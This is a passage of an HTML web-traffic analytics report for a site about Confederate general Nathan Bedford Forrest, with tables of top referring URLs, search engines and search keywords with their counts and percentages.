<CENTER><B>Top Referring URLs</B></CENTER></TD></TR>
<!-- WT_EXCEL_SHEET_NAME>Top Referring URLs</WT_EXCEL_SHEET_NAME -->
<TR BGCOLOR="#D0D0D0">
<TD WIDTH=5%><B> </B></TD>
<TD WIDTH=100%><FONT SIZE=3 FACE="Arial" COLOR="#000000"><B><CENTER>URL</CENTER></B></TD>
<TD WIDTH=12%><FONT SIZE=3 FACE="Arial" COLOR="#000000"><CENTER><B>User Sessions</B></CENTER></TD></TR>
<TR BGCOLOR="#F0F0F0"><TD WIDTH=10% ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">1</TD><TD><FONT SIZE=2 FACE="Arial" COLOR="#000000"><B><A href="No Referrer">No Referrer</A></B></TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">4647</TD></TR>
<TR BGCOLOR="#FFFFFF"><TD WIDTH=10% ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">2</TD><TD><FONT SIZE=2 FACE="Arial" COLOR="#000000"><B><A href="http://nbforrest.com/">http://nbforrest.com/</A></B></TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">846</TD></TR>
<TR BGCOLOR="#F0F0F0"><TD WIDTH=10% ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">3</TD><TD><FONT SIZE=2 FACE="Arial" COLOR="#000000"><B><A href="http://nbforrest.com/nbf_pics.htm">http://nbforrest.com/nbf_pics.htm</A></B></TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">531</TD></TR>
<TR BGCOLOR="#FFFFFF"><TD WIDTH=10% ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">4</TD><TD><FONT SIZE=2 FACE="Arial" COLOR="#000000"><B><A href="http://billslater.com/wfs_heroes.htm">http://billslater.com/wfs_heroes.htm</A></B></TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">515</TD></TR>
<TR BGCOLOR="#F0F0F0"><TD WIDTH=10% ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">5</TD><TD><FONT SIZE=2 FACE="Arial" COLOR="#000000"><B><A href="http://www.freebank.com/">http://www.freebank.com/</A></B></TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">268</TD></TR>
<TR BGCOLOR="#FFFFFF"><TD WIDTH=10% ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">6</TD><TD><FONT SIZE=2 FACE="Arial" COLOR="#000000"><B><A href="http://nbforrest.com/forrest.asp">http://nbforrest.com/forrest.asp</A></B></TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">228</TD></TR>
<TR BGCOLOR="#F0F0F0"><TD WIDTH=10% ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">7</TD><TD><FONT SIZE=2 FACE="Arial" COLOR="#000000"><B><A href="http://www.freebank.com/nbf_1875-07.htm">http://www.freebank.com/nbf_1875-07.htm</A></B></TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">189</TD></TR>
<TR BGCOLOR="#FFFFFF"><TD WIDTH=10% ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">8</TD><TD><FONT SIZE=2 FACE="Arial" COLOR="#000000"><B><A href="http://billslater.com/wfs_sec_mywebwork.htm">http://billslater.com/wfs_sec_mywebwork.htm</A></B></TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">184</TD></TR>
<TR BGCOLOR="#F0F0F0"><TD WIDTH=10% ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">9</TD><TD><FONT SIZE=2 FACE="Arial" COLOR="#000000"><B><A href="http://nbforrest.com/nbf_bye.htm">http://nbforrest.com/nbf_bye.htm</A></B></TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">166</TD></TR>
<TR BGCOLOR="#FFFFFF"><TD WIDTH=10% ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">10</TD><TD><FONT SIZE=2 FACE="Arial" COLOR="#000000"><B><A href="http://www.freebank.com/nbf_pics.htm">http://www.freebank.com/nbf_pics.htm</A></B></TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">166</TD></TR>
<TR BGCOLOR="#F0F0F0"><TD WIDTH=10% ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">11</TD><TD><FONT SIZE=2 FACE="Arial" COLOR="#000000"><B><A href="http://www.billslater.com/forrest.htm">http://www.billslater.com/forrest.htm</A></B></TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">130</TD></TR>
<TR BGCOLOR="#FFFFFF"><TD WIDTH=10% ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">12</TD><TD><FONT SIZE=2 FACE="Arial" COLOR="#000000"><B><A href="http://billslater.com/wfs_domains.htm">http://billslater.com/wfs_domains.htm</A></B></TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">85</TD></TR>
<TR BGCOLOR="#F0F0F0"><TD WIDTH=10% ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">13</TD><TD><FONT SIZE=2 FACE="Arial" COLOR="#000000"><B><A href="http://www.forrestmonument.org/">http://www.forrestmonument.org/</A></B></TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">75</TD></TR>
<TR BGCOLOR="#FFFFFF"><TD WIDTH=10% ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">14</TD><TD><FONT SIZE=2 FACE="Arial" COLOR="#000000"><B><A href="http://nbforrest.com/nbf_more.htm">http://nbforrest.com/nbf_more.htm</A></B></TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">70</TD></TR>
<TR BGCOLOR="#F0F0F0"><TD WIDTH=10% ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">15</TD><TD><FONT SIZE=2 FACE="Arial" COLOR="#000000"><B><A href="http://www.freebank.com/forrest.asp">http://www.freebank.com/forrest.asp</A></B></TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">63</TD></TR>
<TR BGCOLOR="#FFFFFF"><TD WIDTH=10% ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">16</TD><TD><FONT SIZE=2 FACE="Arial" COLOR="#000000"><B><A href="http://nbforrest.com/nbf_controversies.htm">http://nbforrest.com/nbf_controversies.htm</A></B></TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">62</TD></TR>
<TR BGCOLOR="#F0F0F0"><TD WIDTH=10% ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">17</TD><TD><FONT SIZE=2 FACE="Arial" COLOR="#000000"><B><A href="http://www.google.com/search?q=Nathan+bedford+Forrest">http://www.google.com/search?q=Nathan+bedford+Forrest</A></B></TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">56</TD></TR>
<TR BGCOLOR="#FFFFFF"><TD WIDTH=10% ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">18</TD><TD><FONT SIZE=2 FACE="Arial" COLOR="#000000"><B><A href="http://nbforrest.com/nbf_1875-07.htm">http://nbforrest.com/nbf_1875-07.htm</A></B></TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">53</TD></TR>
<TR BGCOLOR="#F0F0F0"><TD WIDTH=10% ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">19</TD><TD><FONT SIZE=2 FACE="Arial" COLOR="#000000"><B><A href="http://nbforrest.com/nbf_memorial.htm">http://nbforrest.com/nbf_memorial.htm</A></B></TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">48</TD></TR>
<TR BGCOLOR="#FFFFFF"><TD WIDTH=10% ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">20</TD><TD><FONT SIZE=2 FACE="Arial" COLOR="#000000"><B><A href="http://nbforrest.com/nbf_whats_new.htm">http://nbforrest.com/nbf_whats_new.htm</A></B></TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">44</TD></TR>
<TR BGCOLOR="#F0F0F0">
<TD> </TD>
<TD><FONT SIZE=2 FACE="Arial" COLOR="#000000"><B>Sub Total for the Referrers Above</B></TD>
<TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000"><B>8426</B></TD></TR>
<TR BGCOLOR="#D0D0D0">
<TD> </TD>
<TD WIDTH=100%><FONT SIZE=3 FACE="Arial" COLOR="#000000"><B>Total for the Log File</B></TD>
<TD ALIGN="CENTER"><FONT SIZE=3 FACE="Arial" COLOR="#000000"><B>10898</B></TD></TR>
</TABLE></CENTER>
<!-- WT_CRLF -->
<!-- WT_PAGEBREAK -->
><HR><P>
</BODY>
<BODY BGCOLOR="#FFFFFF" BACKGROUND="">
<a name="TopSearchEngines"><!--Referrers & Keywords::Top Search Engines--></A>
<!-- WT_H1>Top Search Engines</WT_H1 -->
<!-- Start Strip -->
<CENTER><TABLE BORDER=0 WIDTH=100%><TR>
<TD ALIGN=LEFT WIDTH=100% BGCOLOR="#0000FF"><FONT SIZE=4 FACE="Arial" COLOR="#FFFFFF"><B>Top Search Engines</B></FONT></TD>
<TD BGCOLOR="#FFFFFF"><PRE> </PRE></TD>
</TR></TABLE></CENTER>
<!-- End Strip -->
<P>
<!-- WT_CRLF -->
<FONT SIZE=3 FACE="Arial" COLOR="#000000"><!-- WT_DESCRIPTION -->The graphic illustrates the new user sessions initiated by searches from each search engine. The first table identifies which search engines referred visitors to the site the most often. Note that each search may contain several keywords. The second table identifies the main keywords for each search engine.<!-- /WT_DESCRIPTION --></FONT>
<!-- WT_CRLF -->
<!-- WT_CRLF -->
<P><CENTER><TABLE BORDER=1 CELLSPACING=0 WIDTH=90%>
<TR BGCOLOR="#74C6F6">
<TD COLSPAN=4 ROWSPAN=1 NOWRAP><FONT SIZE=+1 FACE="Arial" COLOR="#000000">
<!-- WT_TABLE_STATS>4, .3, 3.7, 1
, 1
</WT_TABLE_STATS -->
<CENTER><B>Top Search Engines</B></CENTER></TD></TR>
<!-- WT_EXCEL_SHEET_NAME>Top Search Engines</WT_EXCEL_SHEET_NAME -->
<TR BGCOLOR="#D0D0D0">
<TD WIDTH=5%><B> </B></TD>
<TD WIDTH=100%><FONT SIZE=3 FACE="Arial" COLOR="#000000"><B><CENTER>Engines</CENTER></B></TD>
<TD WIDTH=12%><FONT SIZE=3 FACE="Arial" COLOR="#000000"><CENTER><B>Searches</B></CENTER></TD>
<TD WIDTH=12%><FONT SIZE=3 FACE="Arial" COLOR="#000000"><CENTER><B>% of Total</B></CENTER></TD>
</TR>
<TR BGCOLOR="#F0F0F0"><TD WIDTH=10% ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">1</TD><TD><FONT SIZE=2 FACE="Arial" COLOR="#000000"><B>Yahoo</B></TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">162</TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">79.02%</TD></TR>
<TR BGCOLOR="#FFFFFF"><TD WIDTH=10% ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">2</TD><TD><FONT SIZE=2 FACE="Arial" COLOR="#000000"><B>Lycos</B></TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">31</TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">15.12%</TD></TR>
<TR BGCOLOR="#F0F0F0"><TD WIDTH=10% ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">3</TD><TD><FONT SIZE=2 FACE="Arial" COLOR="#000000"><B>AltaVista</B></TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">8</TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">3.9%</TD></TR>
<TR BGCOLOR="#FFFFFF"><TD WIDTH=10% ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">4</TD><TD><FONT SIZE=2 FACE="Arial" COLOR="#000000"><B>Excite</B></TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">4</TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">1.95%</TD></TR>
<TR BGCOLOR="#F0F0F0">
<TD> </TD>
<TD><FONT SIZE=2 FACE="Arial" COLOR="#000000"><B>Total of Searches for the Engines Above</B></TD>
<TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000"><B>205</B></TD>
<TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000"><B>100%</B></TD>
</TR>
<TR BGCOLOR="#D0D0D0">
<TD> </TD>
<TD WIDTH=100%><FONT SIZE=3 FACE="Arial" COLOR="#000000"><B>Total of Searches for the Log File</B></TD>
<TD ALIGN="CENTER"><FONT SIZE=3 FACE="Arial" COLOR="#000000"><B>205</B></TD>
<TD ALIGN="CENTER"><FONT SIZE=3 FACE="Arial" COLOR="#000000"><B>100%</B></TD>
</TR>
</TABLE></CENTER>
<!-- WT_CRLF -->
><HR><P>
</BODY>
<BODY BGCOLOR="#FFFFFF" BACKGROUND="">
<P><CENTER><TABLE BORDER=1 CELLSPACING=0 WIDTH=90%>
<TR BGCOLOR="#74C6F6">
<TD COLSPAN=4 ROWSPAN=1 NOWRAP><FONT SIZE=+1 FACE="Arial" COLOR="#000000">
<!-- WT_TABLE_STATS>4, 2, 2, 1
, 1
</WT_TABLE_STATS -->
<CENTER><B>Top Search Engines with Keywords Detail</B></CENTER></TD></TR>
<!-- WT_EXCEL_SHEET_NAME>Top Search Engines with Keywords Detail</WT_EXCEL_SHEET_NAME -->
<TR BGCOLOR="#D0D0D0">
<TD WIDTH=100%><FONT SIZE=3 FACE="Arial" COLOR="#000000"><B><CENTER>Engines</CENTER></B></TD>
<TD WIDTH=100%><FONT SIZE=3 FACE="Arial" COLOR="#000000"><B><CENTER>Keywords</CENTER></B></TD>
<TD WIDTH=12%><FONT SIZE=3 FACE="Arial" COLOR="#000000"><CENTER><B>Keywords Found</B></CENTER></TD>
<TD WIDTH=12%><FONT SIZE=3 FACE="Arial" COLOR="#000000"><CENTER><B>% of Total</B></CENTER></TD>
</TR>
<TR BGCOLOR="#F0F0F0"><TD><FONT SIZE=2 FACE="Arial" COLOR="#000000"><B>Yahoo </B></TD><TD><FONT SIZE=2 FACE="Arial" COLOR="#000000">forrest </TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">82</TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">40%</TD></TR>
<TR BGCOLOR="#F0F0F0"><TD><FONT SIZE=2 FACE="Arial" COLOR="#000000"><B> </B></TD><TD><FONT SIZE=2 FACE="Arial" COLOR="#000000">bedford </TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">58</TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">28.29%</TD></TR>
<TR BGCOLOR="#F0F0F0"><TD><FONT SIZE=2 FACE="Arial" COLOR="#000000"><B> </B></TD><TD><FONT SIZE=2 FACE="Arial" COLOR="#000000">nathan </TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">55</TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">26.82%</TD></TR>
<TR BGCOLOR="#F0F0F0"><TD><FONT SIZE=2 FACE="Arial" COLOR="#000000"><B> </B></TD><TD><FONT SIZE=2 FACE="Arial" COLOR="#000000">of </TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">21</TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">10.24%</TD></TR>
<TR BGCOLOR="#F0F0F0"><TD><FONT SIZE=2 FACE="Arial" COLOR="#000000"><B> </B></TD><TD><FONT SIZE=2 FACE="Arial" COLOR="#000000">pictures </TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">14</TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">6.82%</TD></TR>
<TR BGCOLOR="#F0F0F0"><TD><FONT SIZE=2 FACE="Arial" COLOR="#000000"><B> </B></TD><TD><FONT SIZE=2 FACE="Arial" COLOR="#000000">the </TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">13</TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">6.34%</TD></TR>
<TR BGCOLOR="#F0F0F0"><TD><FONT SIZE=2 FACE="Arial" COLOR="#000000"><B> </B></TD><TD><FONT SIZE=2 FACE="Arial" COLOR="#000000">klux </TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">11</TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">5.36%</TD></TR>
<TR BGCOLOR="#F0F0F0"><TD><FONT SIZE=2 FACE="Arial" COLOR="#000000"><B> </B></TD><TD><FONT SIZE=2 FACE="Arial" COLOR="#000000">klan </TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">11</TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">5.36%</TD></TR>
<TR BGCOLOR="#F0F0F0"><TD><FONT SIZE=2 FACE="Arial" COLOR="#000000"><B> </B></TD><TD><FONT SIZE=2 FACE="Arial" COLOR="#000000">nathaniel </TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">10</TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">4.87%</TD></TR>
<TR BGCOLOR="#F0F0F0"><TD><FONT SIZE=2 FACE="Arial" COLOR="#000000"><B> </B></TD><TD><FONT SIZE=2 FACE="Arial" COLOR="#000000">general </TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">9</TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">4.39%</TD></TR>
<TR BGCOLOR="#FFFFFF"><TD><FONT SIZE=2 FACE="Arial" COLOR="#000000"><B>Lycos </B></TD><TD><FONT SIZE=2 FACE="Arial" COLOR="#000000">forrest </TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">20</TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">9.75%</TD></TR>
<TR BGCOLOR="#FFFFFF"><TD><FONT SIZE=2 FACE="Arial" COLOR="#000000"><B> </B></TD><TD><FONT SIZE=2 FACE="Arial" COLOR="#000000">nathan </TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">15</TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">7.31%</TD></TR>
<TR BGCOLOR="#FFFFFF"><TD><FONT SIZE=2 FACE="Arial" COLOR="#000000"><B> </B></TD><TD><FONT SIZE=2 FACE="Arial" COLOR="#000000">bedford </TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">13</TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">6.34%</TD></TR>
<TR BGCOLOR="#FFFFFF"><TD><FONT SIZE=2 FACE="Arial" COLOR="#000000"><B> </B></TD><TD><FONT SIZE=2 FACE="Arial" COLOR="#000000">general </TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">4</TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">1.95%</TD></TR>
<TR BGCOLOR="#FFFFFF"><TD><FONT SIZE=2 FACE="Arial" COLOR="#000000"><B> </B></TD><TD><FONT SIZE=2 FACE="Arial" COLOR="#000000">brice's </TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">2</TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">0.97%</TD></TR>
<TR BGCOLOR="#FFFFFF"><TD><FONT SIZE=2 FACE="Arial" COLOR="#000000"><B> </B></TD><TD><FONT SIZE=2 FACE="Arial" COLOR="#000000">benefield </TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">2</TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">0.97%</TD></TR>
<TR BGCOLOR="#FFFFFF"><TD><FONT SIZE=2 FACE="Arial" COLOR="#000000"><B> </B></TD><TD><FONT SIZE=2 FACE="Arial" COLOR="#000000">pictures </TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">2</TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">0.97%</TD></TR>
<TR BGCOLOR="#FFFFFF"><TD><FONT SIZE=2 FACE="Arial" COLOR="#000000"><B> </B></TD><TD><FONT SIZE=2 FACE="Arial" COLOR="#000000">1865 </TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">2</TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">0.97%</TD></TR>
<TR BGCOLOR="#FFFFFF"><TD><FONT SIZE=2 FACE="Arial" COLOR="#000000"><B> </B></TD><TD><FONT SIZE=2 FACE="Arial" COLOR="#000000">andrew </TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">1</TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">0.48%</TD></TR>
<TR BGCOLOR="#FFFFFF"><TD><FONT SIZE=2 FACE="Arial" COLOR="#000000"><B> </B></TD><TD><FONT SIZE=2 FACE="Arial" COLOR="#000000">crossroads </TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">1</TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">0.48%</TD></TR>
<TR BGCOLOR="#F0F0F0"><TD><FONT SIZE=2 FACE="Arial" COLOR="#000000"><B>AltaVista </B></TD><TD><FONT SIZE=2 FACE="Arial" COLOR="#000000">forrest </TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">4</TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">1.95%</TD></TR>
<TR BGCOLOR="#F0F0F0"><TD><FONT SIZE=2 FACE="Arial" COLOR="#000000"><B> </B></TD><TD><FONT SIZE=2 FACE="Arial" COLOR="#000000">bearers </TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">1</TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">0.48%</TD></TR>
<TR BGCOLOR="#F0F0F0"><TD><FONT SIZE=2 FACE="Arial" COLOR="#000000"><B> </B></TD><TD><FONT SIZE=2 FACE="Arial" COLOR="#000000">bedford </TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">1</TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">0.48%</TD></TR>
<TR BGCOLOR="#F0F0F0"><TD><FONT SIZE=2 FACE="Arial" COLOR="#000000"><B> </B></TD><TD><FONT SIZE=2 FACE="Arial" COLOR="#000000">al </TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">1</TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">0.48%</TD></TR>
<TR BGCOLOR="#F0F0F0"><TD><FONT SIZE=2 FACE="Arial" COLOR="#000000"><B> </B></TD><TD><FONT SIZE=2 FACE="Arial" COLOR="#000000">national </TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">1</TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">0.48%</TD></TR>
<TR BGCOLOR="#F0F0F0"><TD><FONT SIZE=2 FACE="Arial" COLOR="#000000"><B> </B></TD><TD><FONT SIZE=2 FACE="Arial" COLOR="#000000">heritage </TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">1</TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">0.48%</TD></TR>
<TR BGCOLOR="#F0F0F0"><TD><FONT SIZE=2 FACE="Arial" COLOR="#000000"><B> </B></TD><TD><FONT SIZE=2 FACE="Arial" COLOR="#000000">maeve </TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">1</TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">0.48%</TD></TR>
<TR BGCOLOR="#F0F0F0"><TD><FONT SIZE=2 FACE="Arial" COLOR="#000000"><B> </B></TD><TD><FONT SIZE=2 FACE="Arial" COLOR="#000000">nathan </TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">1</TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">0.48%</TD></TR>
<TR BGCOLOR="#F0F0F0"><TD><FONT SIZE=2 FACE="Arial" COLOR="#000000"><B> </B></TD><TD><FONT SIZE=2 FACE="Arial" COLOR="#000000">550 </TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">1</TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">0.48%</TD></TR>
<TR BGCOLOR="#F0F0F0"><TD><FONT SIZE=2 FACE="Arial" COLOR="#000000"><B> </B></TD><TD><FONT SIZE=2 FACE="Arial" COLOR="#000000">of </TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">1</TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">0.48%</TD></TR>
<TR BGCOLOR="#FFFFFF"><TD><FONT SIZE=2 FACE="Arial" COLOR="#000000"><B>Excite </B></TD><TD><FONT SIZE=2 FACE="Arial" COLOR="#000000">forrest </TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">4</TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">1.95%</TD></TR>
<TR BGCOLOR="#FFFFFF"><TD><FONT SIZE=2 FACE="Arial" COLOR="#000000"><B> </B></TD><TD><FONT SIZE=2 FACE="Arial" COLOR="#000000">pictures </TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">3</TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">1.46%</TD></TR>
<TR BGCOLOR="#FFFFFF"><TD><FONT SIZE=2 FACE="Arial" COLOR="#000000"><B> </B></TD><TD><FONT SIZE=2 FACE="Arial" COLOR="#000000">preserve </TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">1</TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">0.48%</TD></TR>
</TABLE></CENTER>
<!-- WT_CRLF -->
<!-- WT_PAGEBREAK -->
><HR><P>
</BODY>
<BODY BGCOLOR="#FFFFFF" BACKGROUND="">
<a name="TopSearchKeywords"><!--Referrers & Keywords::Top Search Keywords--></A>
<!-- WT_H1>Top Search Keywords</WT_H1 -->
<!-- Start Strip -->
<CENTER><TABLE BORDER=0 WIDTH=100%><TR>
<TD ALIGN=LEFT WIDTH=100% BGCOLOR="#0000FF"><FONT SIZE=4 FACE="Arial" COLOR="#FFFFFF"><B>Top Search Keywords</B></FONT></TD>
<TD BGCOLOR="#FFFFFF"><PRE> </PRE></TD>
</TR></TABLE></CENTER>
<!-- End Strip -->
<P>
<!-- WT_CRLF -->
<FONT SIZE=3 FACE="Arial" COLOR="#000000"><!-- WT_DESCRIPTION -->The first table identifies keywords which led the most visitors to the site (regardless of the search engine). The second table identifies, for each keyword, which search engines led visitors to the site.<!-- /WT_DESCRIPTION --></FONT>
<!-- WT_CRLF -->
<!-- WT_CRLF -->
<P><CENTER><TABLE BORDER=1 CELLSPACING=0 WIDTH=90%>
<TR BGCOLOR="#74C6F6">
<TD COLSPAN=4 ROWSPAN=1 NOWRAP><FONT SIZE=+1 FACE="Arial" COLOR="#000000">
<!-- WT_TABLE_STATS>4, .3, 3.7, 1
, 1
</WT_TABLE_STATS -->
<CENTER><B>Top Search Keywords</B></CENTER></TD></TR>
<!-- WT_EXCEL_SHEET_NAME>Top Search Keywords</WT_EXCEL_SHEET_NAME -->
<TR BGCOLOR="#D0D0D0">
<TD WIDTH=5%><B> </B></TD>
<TD WIDTH=100%><FONT SIZE=3 FACE="Arial" COLOR="#000000"><B><CENTER>Keywords</CENTER></B></TD>
<TD WIDTH=12%><FONT SIZE=3 FACE="Arial" COLOR="#000000"><CENTER><B>Keywords found</B></CENTER></TD>
<TD WIDTH=12%><FONT SIZE=3 FACE="Arial" COLOR="#000000"><CENTER><B>% of Total</B></CENTER></TD>
</TR>
